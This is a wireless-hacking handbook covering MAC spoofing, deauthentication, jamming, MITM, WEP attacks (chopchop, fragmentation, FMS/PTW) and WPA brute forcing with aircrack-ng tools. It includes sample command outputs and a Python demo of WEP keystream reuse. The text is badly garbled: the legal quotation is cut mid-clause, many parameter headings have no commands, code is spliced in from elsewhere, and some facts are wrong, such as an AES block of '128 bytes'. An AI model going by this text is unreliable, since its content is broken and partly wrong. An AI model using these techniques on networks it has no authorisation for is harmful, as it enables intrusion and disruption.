The authors and the publisher have taken care to ensure the information in
this publication is reliable and complete, but cannot assume responsibility
for its use and for any related potential breach of patents or copyright.
The authors and the publisher cannot assume responsibility for any
consequences or damage in connection with the use of the information in
this publication.
CSH Press
82-500 Kwidzyn
Dluga 27, Poland
e-mail: contact@hackingschool.com
Legal information
We would like to draw your attention to the fact that this handbook
and the included live training movies and software can be used only to
protect your IT environment. Conducting an attack on another IT
system without the permission of its respective owner is penalized
by the federal Computer Fraud and Abuse Act. If you live outside
the United States, please refer to your local law.
“(a) Whoever—
(1) having knowingly accessed a computer without authorization or
exceeding authorized access, and by means of such conduct having
obtained information that has been determined by the United States
Government pursuant to an Executive order or statute to require
protection against unauthorized disclosure for reasons of national defense
or foreign relations, or any restricted data, as defined in paragraph y.
of section 11 of the Atomic Energy Act of 1954, with reason to believe that
such information so obtained could be used to the injury of the United
States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or
transmitted, or attempts to communicate, deliver, transmit or cause to
be communicated, delivered, or transmitted the same to any person not
entitled to receive it, or willfully retains the same and fails to deliver it to
the officer or employee of the United States entitled to receive it;
(2) intentionally accesses a computer without authorization or exceeds
authorized access, and thereby obtains—
(A) information contained in a financial record of a financial
institution, or of a card issuer as defined in section 1602 (n) of title 15,
or contained in a file of a consumer reporting agency on a consumer,
as such terms are defined in the Fair Credit Reporting Act
(15 U.S.C. 1681 et seq.);
(B) information from any department or agency of the United States;
or
(C) information from any protected computer;
(3) intentionally, without authorization to access any nonpublic
computer of a department or agency of the United States, accesses such
a computer of that department or agency that is exclusively for the use
of the Government of the United States or, in the case of a computer not
exclusively for such use, is used by or for the Government of the United
States and such conduct affects that use by or for the Government of the
United States;
(4) knowingly and with intent to defraud, accesses a protected computer
without authorization, or exceeds authorized access, and by means of such
conduct furthers the intended fraud and obtains anything of value, unless
the object of the fraud and the thing obtained consists only of the use of
the computer and the value of such use is not more than $5,000 in any
1-year period;
(5)
(A) knowingly causes the transmission of a program, information,
code, or command, and as a result of such conduct, intentionally
causes damage without authorization, to a protected computer;
(c) The punishment for an offense under subsection (a) or (b) of this
section is—
(1)
(A) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(1) of this section
which does not occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty
years, or both, in the case of an offense under subsection (a)(1) of this
section which occurs after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph;
(2)
(A) except as provided in subparagraph (B), a fine under this title or
imprisonment for not more than one year, or both, in the case of an
offense under subsection (a)(2), (a)(3), or (a)(6) of this section which
does not occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or
both, in the case of an offense under subsection (a)(2), or an attempt to
commit an offense punishable under this subparagraph, if—
(i) the offense was committed for purposes of commercial
advantage or private financial gain;
(ii) the offense was committed in furtherance of any criminal or
tortious act in violation of the Constitution or laws of the United
States or of any State; or
(iii) the value of the information obtained exceeds $5,000; and
(C) a fine under this title or imprisonment for not more than ten
years, or both, in the case of an offense under subsection (a)(2),
(a)(3) or (a)(6) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)
(A) a fine under this title or imprisonment for not more than five years,
or both, in the case of an offense under subsection (a)(4) or (a)(7) of this
section which does not occur after a conviction for another offense
under this section, or an attempt to commit an offense punishable
under this subparagraph; and
(B) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(4), or (a)(7) of
this section which occurs after a conviction for another offense under
(d)
(1) The United States Secret Service shall, in addition to any other agency
having such authority, have the authority to investigate offenses under this
section.
(2) The Federal Bureau of Investigation shall have primary authority
to investigate offenses under subsection (a)(1) for any cases involving
espionage, foreign counterintelligence, information protected against
(C) a credit union with accounts insured by the National Credit Union
Administration;
(D) a member of the Federal home loan bank system and any home
loan bank;
(E) any institution of the Farm Credit System under the Farm Credit
Act of 1971;
(F) a broker-dealer registered with the Securities and Exchange
Commission pursuant to section 15 of the Securities Exchange Act
of 1934;
(G) the Securities Investor Protection Corporation;
(H) a branch or agency of a foreign bank (as such terms are defined in
paragraphs (1) and (3) of section 1(b) of the International Banking Act
of 1978); and
(I) an organization operating under section 25 or section 25(a)
of the Federal Reserve Act;
(5) the term “financial record” means information derived from
any record held by a financial institution pertaining to a customer’s
relationship with the financial institution;
(6) the term “exceeds authorized access” means to access a computer with
authorization and to use such access to obtain or alter information in the
computer that the accesser is not entitled so to obtain or alter;
(7) the term “department of the United States” means the legislative or
judicial branch of the Government or one of the executive departments
enumerated in section 101 of title 5;
(8) the term “damage” means any impairment to the integrity
or availability of data, a program, a system, or information;
(9) the term “government entity” includes the Government of the
United States, any State or political subdivision of the United States, any
foreign country, and any state, province, municipality, or other political
subdivision of a foreign country;
(10) the term “conviction” shall include a conviction under the law of any
State for a crime punishable by imprisonment for more than 1 year, an
element of which is unauthorized access, or exceeding authorized access,
to a computer;
(11) the term “loss” means any reasonable cost to any victim, including the
cost of responding to an offense, conducting a damage assessment, and
restoring the data, program, system, or information to its condition prior
to the offense, and any revenue lost, cost incurred, or other consequential
damages incurred because of interruption of service; and
(12) the term “person” means any individual, firm, corporation,
educational institution, financial institution, governmental entity, or legal
or other entity.
(h) The Attorney General and the Secretary of the Treasury shall report
to the Congress annually, during the first 3 years following the date of the
enactment of this subsection, concerning investigations and prosecutions
under subsection (a)(5).
(i)
(1) The court, in imposing sentence on any person convicted of a violation
of this section, or convicted of conspiracy to violate this section, shall
enter any other IT system during your tests, you have to cease
them and inform the administrator.
– The results of the tests should be kept away from any third
person.
Additional legal info can be found in the full text of the federal
Computer Fraud and Abuse Act. Please note that the information
stated herein is valid at the time of publication and it may be subject
to change at any time.
Chapter 1
Introduction to wireless networks
Chapter outline:
1. Introduction
2. Wireless transmission standards
3. Wireless network types
4. Encryption and authentication standards
5. Wireless network interface cards in Linux
Introduction
Anyone using the Internet is well-aware of all wireless networking
hiccups and internal flaws. We are annoyed with network
downtimes and the increased break-in likelihood (the traditional
wired networks are less susceptible in that regard). There can
be many different outcomes of an intrusion. Usually, the damage
to be feared is data loss – but keep in mind eavesdroppers can
You need:
Standard   Parameter          Values
802.11a    data rate [MB/s]   12    24    36    48    54
           range [m]          150   80    50    30    15
802.11b    data rate [MB/s]   2     5.5   11
           range [m]          150   90    45
The first major standard update to catch on was 802.11b, and even
today devices that use this networking technology have not been
fully superseded. The strength of 802.11b was longer range, resulting
from a lowered frequency (at 2.4 GHz). The max speed is 11 Mbps,
but usable data (meaningful information, as opposed to for example
lost packets) only equals half of sent data.
First and foremost, wireless networks are not isolated from one
another by any means (like a cable can provide isolation in wired
networks). By contrast, wireless networks all share a medium, which
is the air. Very often neighboring residences or organizations set up
separate Internet connectivity. Channels have been developed to
negate the effects of antennas overlapping and causing interference.
Consider the way cellular networks, television or the radio
technology works with radio waves emitted over a shared medium,
the open air: nonetheless two or more wireless networks do not
create interference. The simple cause for this is that the signals are
broadcast over different frequencies: this is the reason we talk of the
2.4–2.5 GHz band rather than a specific frequency.
The issues of range and reach are more emphatic here than with
other networks (such as GSM). A primary concern is keeping
two devices that want to communicate over the network in close
proximity: they need to ‘see’ each other. In practice, this means
that when you stand next to your AP and look at your computer
(equipped with a wireless network interface card), it must be
within your eyesight (that said, a thin wall or a glass door are not
big roadblocks in transmission). No obstacles like thick walls or
interfering devices must be in between these objects. If there is no
obvious way you can plan your network to avoid these obstacles and
if waves cannot bounce off them and propagate in a room, consider
setting up an additional AP to work as a bridge between the initial
AP and an end point.
# airmon-ng
The parameters:
mode: sets the operating mode of the device (type a selected mode)
Wireless security (half) measures: An overview
Chapter outline:
1. MAC address filtering
2. Disabling ESSID broadcast
3. Limiting wireless coverage
The parameters:
Right: you know that a MAC address can be forged and know how
to spoof it. But what hardware address should be selected? The new
address must be in the MAC address pool assigned for the network.
All you need to do is to check available MAC addresses in the pool.
The tool for the job is the airodump-ng application (to be precise,
a sniffer). The program can look up the hardware addresses of
hosts that are active at the time of running it. Before you start it,
the interface operating mode needs to be set to monitor. Run this
command:
The parameters:
# airodump-ng wlan1
The parameters:
Before we go any further, there are some errors that can crop up as
early as this stage. If you have not taken care to get the right drivers,
your wireless network interface will not be set in monitor mode,
prompting an error message.
date and time. The next line provides titles for each column, and the
lines after it show detected access points.
BSSID: the MAC address of the access point the client is associated
with
PWR: signal level (its range depends on the card driver: the higher
the value, the stronger the signal)
The first is to wait for a user to log in (the network name is sent
in clear text at logons). The other, much more efficient solution
requires a would-be intruder to disconnect a user, for example using
aireplay-ng from the aircrack-ng toolkit. The tool allows you to
run certain types of attack on WLANs. Type this command in the
terminal in order to deauthenticate a client:
The parameters:
This attack mode works not only with open networks (that use
no authentication and encryption). Why is that? The pivotal item
in the attack was ‘telling’ your target it has been disconnected.
Aireplay generates a deauthentication packet and ‘signs’ it with the
MAC address of the access point. No encryption is applied at the
level at which these commands run, so you do not need a key to
communicate. The levels are referred to as layers and were defined
as early as 1983. The 7-layer model has been developed by the
International Organization for Standardization (ISO). Information
is passed starting at the application layer in one station proceeding
hierarchically from one layer to another layer (implemented by
protocols). The following is an example of opening a web page
on a wireless network: http → tcp → ip → 802.11 → cable →
ADSL → Ethernet → ip → tcp → http. Layers have been introduced as
a means of facilitating the communication between different devices
and systems via protocols that might be developed by different
vendors.
38 Chapter 2 – Wireless security (half) measures: An overview
[Figure: the layer stacks of two communicating stations side by side: Application, Presentation, Session, Transport, Network]
Chapter outline:
1. Introduction
2. DoS: RF jamming
3. DoS: CSMA/CA jamming
4. DoS: Deauthentication attack
5. Wireless MITM
Introduction
Even a well-protected network that uses an encryption model
you are incapable of cracking is still not fully resistant to some
types of attacks. No wireless network has been and probably will
never be completely immune to DoS (Denial-of-Service) attacks,
and no precautions can protect you from a would-be attacker
equipped with an outsized antenna pointed in the direction
40 Chapter 3 – Wireless network attacks independent of used encryption
DoS: RF jamming
The Denial-of-Service (DoS) attack works by disrupting a targeted
service and preventing it from carrying out its tasks (if the victim is
an access point, it will not be able to receive and send traffic to other
networking devices). The victim becomes overloaded as a result.
DoS attacks require a powerful machine that can generate requests
faster than the victim can respond to them: not plain sailing by any
means.
a simple microwave oven can fit the bill (even though the metal case
and wire-meshed window dramatically reduce the radiation getting
out). Check for microwaves and similar home appliances to make
sure your WLAN topology is free of interrupters.
DoS: CSMA/CA jamming
An example attack:
The parameters:
Wireless MITM
The MITM (Man-in-the-Middle) attack occurs when an
intermediary of sorts is inconspicuously placed in line between
a sender and receiver. This intermediary is an attacker. The Man-
in-the-Middle attacker captures packets sent to an AP, modifies
them and forwards them to the AP. The same can be done with
communications transmitted from an AP to a client.
The wireless key gives WLAN access to anyone who knows it. If
a rogue hacker AP responds faster than the real AP, the malicious
access point will ‘seize’ a client. In the next step, the rogue AP connects
to the rightful access point and sends all information it receives from
its associated client to the original AP. Transparently, all frames sent or
received by a client may be sniffed and changed if desired.
WEP attacks
Chapter outline:
1. WEP encryption
2. Chopchop
3. Keystream reuse
1. packetforge-ng
1. Fragmentation attack
2. Fake authentication
2. easside-ng
4. FMS, KoreK attacks, PTW
1. Interactive packet replay
2. ARP request attack
5. Caffe Latte Attack
48 Chapter 4 – WEP attacks
WEP encryption
To understand the science behind attacks against WEP, start with
getting the knack of the encryption process used in WEP (Wired
Equivalent Privacy), a system designed to provide as much security
as a wired connection.
WEP makes use of the RC4 cipher, which takes the key and
initialization vector values to generate a pseudorandom stream
of bits that corresponds in length to the length of a sent packet.
This value is combined with the plaintext to receive a similarly
pseudorandom output ready to be sent. The (24-bit) initialization
vector is a random number in the range from 0 to 2^24 – 1, or from 0 to
16,777,215. The solution ensures that two identical packets produce
a pair of different ciphertexts. Since attackers have to be assumed to
be well-versed in network protocols, they understand that packets
can be discovered based on how often they appear.
For example, DNS queries are more popular than echo request
(pings). This fact enables you to make educated guesses about the
encrypted plaintext and can be exploited to crack a cipher. This
attack mode is known as the known-plaintext attack.
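[Figure: WEP encryption. The IV and the key are fed to RC4 to produce the keystream; the packet with its CRC32 is XORed with the keystream to give the output]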
XOR 0 1
0 0 1
1 1 0
The first argument is below the bolded XOR, the second is to the
right of it. Since the exclusive disjunction is a bitwise operation,
all arguments have to take either 0 or 1. The four fields that are
isolated from arguments represent the outputs of every possible
combination. As you can see, XOR is true (takes 1) if the inputs are
not alike (0, 1 and 1, 0) and takes 0 in the opposite scenario (0, 0 and
1, 1). XOR-ing can be reversed, which means that if you process an
output with an argument, the result is the missing argument:
[Figure: RC4 produces the KEYSTREAM, which is XORed to give the CIPHERTEXT sent with the IV]
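The WEP encapsulation described in this section, written out as an added example (not code from the book or from aircrack-ng). It shows why XOR reversibility plus a 24-bit IV is fatal: one fully known packet exposes the keystream for its IV, and IVs repeat after only a few thousand packets. The key, IV and payloads are constructed sample values, and the one-byte key-ID field of a real frame is omitted.

```python
import zlib


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Generate `length` keystream bytes from `seed` (RC4 KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || (RC4(IV || key) XOR (plaintext || ICV))."""
    if len(iv) != 3:
        raise ValueError("the WEP IV is 24 bits")
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Decrypt a frame and verify its ICV, as a receiver holding the key does."""
    iv, ciphertext = frame[:3], frame[3:]
    body = xor(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    data, received_icv = body[:-4], body[-4:]
    if icv(data) != received_icv:
        raise ValueError("ICV mismatch")
    return data


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """XOR is its own inverse: ciphertext XOR plaintext gives the keystream."""
    return xor(frame[3:], known + icv(known))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Read a frame that reused the same IV, using no key at all."""
    return xor(frame[3:], keystream)[:-4]


def packets_until_iv_collision(iv_space: int = 2**24, target: float = 0.5) -> int:
    """Smallest count of random IVs whose chance of a repeat reaches `target`."""
    p_unique, n = 1.0, 0
    while 1.0 - p_unique < target:
        p_unique *= (iv_space - n) / iv_space
        n += 1
    return n


if __name__ == "__main__":
    key = bytes.fromhex("0badc0ffee")          # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                       # constructed IV, used twice
    known = b"constructed packet whose content is predictable"
    secret = b"constructed confidential packet"

    frame_a = wep_encrypt(key, iv, known)
    frame_b = wep_encrypt(key, iv, secret)
    assert wep_decrypt(key, frame_a) == known

    # Same key, new IV: identical plaintext now yields a different ciphertext.
    print(wep_encrypt(key, b"\x00\x00\x02", known)[3:] != frame_a[3:])

    # Same key, same IV: the keystream repeats, so one known packet reads the other.
    keystream = keystream_from_known_plaintext(frame_a, known)
    print(decrypt_with_keystream(frame_b, keystream))

    # With random 24-bit IVs a repeat is likely far sooner than 2^24 packets.
    print(packets_until_iv_collision())
```

The practical consequence for a defender is that no WEP key length or rotation schedule fixes this, because the weakness lies in the IV size and the XOR construction rather than in the secret.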
Chopchop
The chopchop attack name derives from the action that occurs in
this technique, that is cutting (chopping off) appropriate bytes from
packets to reveal the plaintext packet, and, consequently, reveal its
keystream in WEP-protected environments.
To understand this and the next attacks in this section, you need to
know how information is encrypted in WEP.
Chop off the last byte in a valid frame and calculate the checksum,
assuming the removed plaintext byte is 0. Send the edited message
to an AP. If the AP drops it, this means your A is not correct and you
need to re-calculate CRC32 with a different value for the missing
part. Repeat the procedure until there is a match. When successful,
continue using the method to reveal another value. But doesn’t it
all take too long? Chopchopping and similar attacks make use of
pure mathematics and the birthday paradox phenomenon. How
many people have to be in a group for the probability of at least two
persons sharing a birthday to equal at least ½? At a glance, it seems
the answer is 365/2; however, once you inspect this thoroughly, the
figure drops to just 23.
DATA A CRC(DATA+A)
Let’s say you have a WEP-protected network and want to see the
contents of selected packets or, whatever the reason, cannot use any
other way to capture a keystream needed to generate an ARP packet.
You can then fall back on the chopchop attack implemented in the
aireplay-ng utility included in aircrack-ng.
The parameters:
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._..“
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? Y
If you think this is a suitable packet, type y and press Enter. Soon
you’ll see the results, which will be similar to the sample output
below:
another attack that requires it. Note that the attack can be also used
to slowly read transmissions: it is enough to eavesdrop on traffic for
some time and try to decode the packets later.
The keystream can also be used to inject decrypted data into the
network.
Keystream reuse
In this chapter we look at the packetforge-ng and easside-ng
applications. They will be examined in more detail below, but before
you go any further, let’s quickly recap what they can be used for.
Let’s now take a closer look at these programs and their usage and
launch some example attacks.
Packetforge-ng
The program creates packets and injects them into wireless
networks without knowing the key. A usage example is generating
ARP packets. ARP request packets are neat for cracking the wireless
key with the use of statistical methods that will be outlined later in
the book. To begin, run this command:
The parameters:
Fragmentation attack
Having captured a single data frame, a hacker can generate large
amounts of keystream for a specific initialization vector that can
later be used to send a crafted message.
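[Figure: the OSI layers (Application, Presentation, Session, Transport, Data Link with the MAC (Media Access Control) sublayer, Physical) beside the start of a frame body: 0xAA 0xAA 0x03 0x00 0x00 0x00 ??, where the trailing bytes are ARP (0x806) or IP (0x800)]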
Thanks to this deduction, you can obtain the first eight bytes of
a keystream, remembering the keystream can be computed if
you XOR the plaintext and the ciphertext. Now, it’s time to fit in
fragmentation. You can divide a packet into 16 smaller fragments
at the most. A salient point is that each fragment is encrypted
individually as a stand-alone message: it follows that if you use
the same vector (the key is constant) for encryption, the reality is
that you are using the same keystream as well. Since you have
found the first 8 bytes of a keystream, the partitions you send will
be 8-byte. Choose a packet to send: let’s make it an ARP request.
Break it down into 8-byte subpackets and encrypt each with the
revealed keystream. For an AP to be able to identify and reassemble
the fragments, you need to set the ‘more fragments’ flag. In the
diagram below the flag is marked as MF.
known:
receiving: 0 SRC DST 1b9e17 SNAP ARP
The parameters:
Running this command will make the program wait for a data
packet to capture. When a data packet is found, it displays
information similar to the sample output below:
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:0F:B5:AB:CB:9D
Source MAC = 00:D0:CF:03:34:8C
0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....‘.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W‘.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q .D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.
Fake authentication
A hacker may do without the wireless network key to successfully
authenticate. In the worst case scenario, with a WEP environment
enabling Shared Key Authentication, the adversary will need
a handful of keystream bytes.
[Figure: Shared Key Authentication exchange: Authentication request, Encrypted challenge, Authentication response]
Easside-ng
An adversary with an Internet connection might be able to
successfully transmit and receive communications in a wireless
network without knowing its key. The requirements are that the
wireless network must have access to the Internet and the attacker
must run dedicated software on an external server.
[Figure: easside-ng operation between the attacker, the AP and the buddy server]
Let’s now pen-test this idea. Start buddy-ng on a buddy server. If you
want, it can start on the client workstation.
# buddy-ng
The response:
buddy-ng
Waiting for connexion
Run this command on the host that uses a wireless card to access
the target network:
Where:
Handshake compl33t
Checking for internet... 1
Internet w0rx. Public IP 10.113.65.187
Rtt 77ms
These steps result in a new interface you can use for Internet
communications:
# ifconfig at0 up
# dhcpcd at0
FMS, KoreK attacks, PTW
The FMS, KoreK and PTW attacks use statistical analysis techniques
to crack WEP keys. We aim to offer a general overview of their mode
of operation rather than scrutinize the mathematics they use. If
you would like to learn more, check out the papers provided in the
bibliography section.
key: 50 41 53 53 57
FMS attack:
Weak IV 1 0A 80 BE 03 57
Weak IV 2 AF 41 B0 13 75
Weak IV 3 34 71 53 28 57
Weak IV 4 50 00 53 53 94
...
Weak IV 1000 50 41 28 42 68
Bit: 50 41 53 53 57
Votes: 17 23 19 27 16
The parameters:
# aircrack-ng -K packets-01.cap
The parameters:
Opening packets-10.cap
Read 877949 packets.
Opening packets-10.cap
Reading packets, please wait...
Aircrack-ng 1.0
KB depth byte(vote)
0 0/ 1 01( 43) 19( 15) 6E( 15) 10( 13) 5F( 13) 0E( 12) 5E( 12) 8C( 12) 60( 5) DD( 5) 2B( 3) 2D( 3)
1 0/ 1 23( 196) FA( 39) D8( 33) 64( 31) 2A( 22) 70( 18) 29( 16) 63( 16) 73( 16) 81( 15) 83( 15) 28( 13)
2 0/ 1 45( 169) 0B( 27) 40( 20) 4B( 20) 30( 17) 20( 15) 42( 15) 10( 13) A0( 13) FE( 13) 01( 10) 02( 10)
3 0/ 1 67( 317) 78( 56) 06( 41) 79( 40) 98( 33) 14( 29) B8( 26) E6( 26) 0F( 24) EB( 24) 29( 23) 65( 23)
4 0/ 2 89( 164) 0B( 87) 30( 30) 79( 30) 3F( 25) 7D( 22) 58( 20) F4( 18) 46( 13) 8F( 13) 2A( 10) 4B( 10)
5 0/ 1 AB( 376) 79( 50) 7A( 44) 10( 35) E6( 32) 11( 29) 63( 24) 76( 23) AC( 23) AE( 23) B6( 21) 62( 19)
6 0/ 1 CD( 276) C6( 46) C5( 44) C2( 29) 64( 23) 03( 20) B9( 20) F8( 20) 40( 18) AD( 18) E5( 18) 8D( 15)
7 0/ 1 EF( 341) E3( 140) 23( 99) 3C( 64) 73( 54) 66( 48) 34( 47) 5B( 46) 2E( 45) 19( 44) 69( 44) 95( 42)
8 0/ 1 01( 285) 29( 90) F3( 87) EC( 54) 30( 38) 6B( 38) 6D( 38) 8B( 36) 63( 35) DC( 35) 12( 33) 41( 33)
9 1/ 2 35( 192) 02( 148) E6( 111) 7D( 99) DF( 88) E5( 82) CF( 78) 24( 75) 07( 67) DE( 64) 5A( 63) D4( 63)
10 1/ 1 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0) 09( 0) 0A( 0) 0B( 0) 0C( 0)
The depth field indicates the current key search, while the value
after the slash shows the number of alternative candidates. Next are
the votes associated with several most voted bytes. As expected, the
key byte values vary wildly. At the bottom is the cracked WEP key.
The output also states how likely this key is to be correct; however, it
is not a cast-iron estimate.
Where:
-w test: the prefix of the file name to which packets are written
# aircrack-ng packets-01.cap
Where:
The parameters:
-w test: the prefix of the file name to which packets are written
The parameters:
Read 10 packets...
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:40:F4:77:E5:C9
Source MAC = 00:0F:B5:34:30:30
0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 .“..\{06)...
Two WEP vulnerabilities are vital for the success of this attack.
The first flaw is the lack of a packet counter, which renders the
security protocol helpless in the face of a replay attack. The other
flaw is the fixed length packets have at encryption. ARP request
packets have a characteristic size, and so you are almost guaranteed
all packets with this size are ARP requests. Listen on a network until
you capture an ARP packet and retransmit it over and over as much
as you want.
The parameters:
-w test: the prefix of the file name to which packets are written
The parameters:
Only the read packets count (84 in the output) increments until
an ARP request is captured. After the program seizes an ARP
request (3 requests are seized in this particular output), it should
automatically start an injection of this packet. As it is being replayed,
the sent packet number goes up and pps (packets per second) will
show different values. You can also tell the attack is successful when
the DATA counter in airodump-ng begins to rapidly increase.
Caffe Latte Attack
The parameters:
The other utility can be used as an alternative for the two previously-
described ways of obtaining initialization vectors.
The parameters:
WPA attacks
Chapter outline:
1. Introduction
2. WPA
3. WPA2
4. Rainbow tables
5. Brute force attack on WPA-PSK networks
6. DoS: Taking advantage of the MIC failure holdoff time
Introduction
With WEP deprecated as insecure, work began on a new standard
to replace it. 802.11i was developed in response, although it soon
became clear that the algorithms used in this WEP successor are
much more computationally intensive and could not be supported
on legacy hardware. As an interim solution, a slightly weaker
82 Chapter 5 – WPA attacks
WPA
WPA introduces a complicated hierarchical key structure. The most
important of the keys is the PMK (Pairwise Master Key). It can be
calculated in two ways. If WPA-PSK (WPA Personal) is enabled, the
key is loaded from local resources: otherwise, an external server is
used for authentication.
[Figure: message sequence with Association, EAP ID request, EAP ID response and EAP authentication request, followed by PMK and PTK]
The elaborate key hierarchy and the ways to derive the PMK were
mentioned above. The Pairwise Master Key is used to generate the
PTK (Pairwise Transient Key) and the GTK (Group Temporal Key).
Other than the PMK, which is passed to the PBKDF2 function (more
about it later), the following components are used to create the first
key (PTK): a fixed string, the access point and client MAC address,
as well as the nonces sent by client and access point, SNonce and
ANonce. The PTK is used to transmit messages between a client
and access point. The GTK meanwhile is used to encrypt broadcast
data traffic. Both keys are 512-bit in WPA, and if WPA2 is used, they
are 384-bit. The PTK and GTK are generated during the four-way
handshake, a type of negotiation whose name originates in the
exchange of four EAPOL-Key messages.
a SNonce and constructs the PTK using the sent ANonce. The key
is broken into several smaller keys, each having a different purpose.
Among those keys is the KCK (Key Confirmation Key), which helps
in generating the MIC (Message Integrity Code) computed using the
Michael algorithm.
Let’s now look at the WPA encryption diagram (figure 17). Rather
than do a simple concatenation of an IV and key, three values are
mixed. The first of them is the temporal key (TK), a part of the PTK.
Mixed with it are the transmitter MAC address (to avoid collisions)
and the 48-bit IV functioning now as a sequence counter. Note that
packets with IV numbers that are equal to or smaller than the last
accepted IV number will be rejected, preventing replay attacks.
Figure 17: WPA encryption diagram
The above-mentioned inputs are mixed and then passed to the RC4
algorithm, just like in WEP.
WPA2
The key negotiation phase in WPA2 is identical to the four-way
handshake employed in WPA except for PMK size, now 384 bits.
This update is a by-product of dropping TMK keys. They have been
deemed redundant due to the omission of Michael (the CCMP
protocol has a built-in MIC generation function). Although as you
can see encryption has become more complicated overall, it also
delivers stronger security. IVs reappear in WPA2, but the name has
been changed to PNs (packet numbers). As in WPA, PNs are
incremented by 1 until they overflow.
The PN is stored in CCMP headers together with the key ID of
an encrypted MPDU. The packet number is also used to construct a Nonce,
which includes the said packet number, sender MAC address and
the priority field (no longer used now: set to zero). The temporal
key, derived using the same method as in WPA, is passed to the
CCMP encryption block alongside the Nonce field, plaintext data
and AAD. Additional Authentication Data is a field that contains
information pertaining to all MAC header fields that should not
change in transit. The information includes source and destination
address. These inputs are processed by the CCMP function, a stream
processing-optimized AES algorithm variant in the CCM mode.
The AES (Advanced Encryption Standard) is a block cipher, and so
you need to feed it data in portions exactly 128 bytes in size. With
the modification, this is not necessary. The CCM mode takes into
account both earlier block encryption outputs and the counter
function output. The latter result is concatenated with MAC and
CCMP headers and then sent.
[Diagram: CCMP encryption. Labels: PN, plaintext MPDU, construct Nonce, construct AAD, key ID, temporal key, construct CCMP header, CCMP encryption, encrypted MPDU]
[Diagram labels: encrypted MPDU, construct Nonce, construct AAD, temporal key, CCMP decryption, plaintext, PN, replay check, plaintext MPDU]
Figure 19: CCMP decryption diagram
All known WEP gaps have been dealt with by these
solutions. The only effective attack on a WPA2 key today is the brute
force technique. A brute force attack might be launched offline
using a captured four-way handshake. To sniff this negotiation,
you might wait for a user to log on or launch a deauthentication
attack, the same as in WEP. Brute force cracking itself is a time-intensive
process, unfortunately, which is reflected in the cracking speed
(depending on hardware type, it averages about 100 passwords
per second). The only attack you can successfully run in these
circumstances is the dictionary attack. The low performance boils
down to the necessity of applying the PBKDF2 function to generate
the PTK. Repeating the HMAC SHA-1 hash function 4,096 times
makes it extremely time-consuming.
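The key hierarchy described in the WPA section and the PBKDF2 cost described above, as an added example (not code from this handbook or from any tool it describes). It derives a PMK and a PTK the way 802.11i specifies and estimates how long different passphrase spaces last at the rates quoted in this text. The function names are this example's own, the MAC addresses and nonces are constructed sample values, and "password"/"IEEE" is the published 802.11i test vector.

```python
import hashlib
import hmac
import time


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK PMK: PBKDF2-HMAC-SHA1, ESSID as salt, 4096 rounds, 256 bits."""
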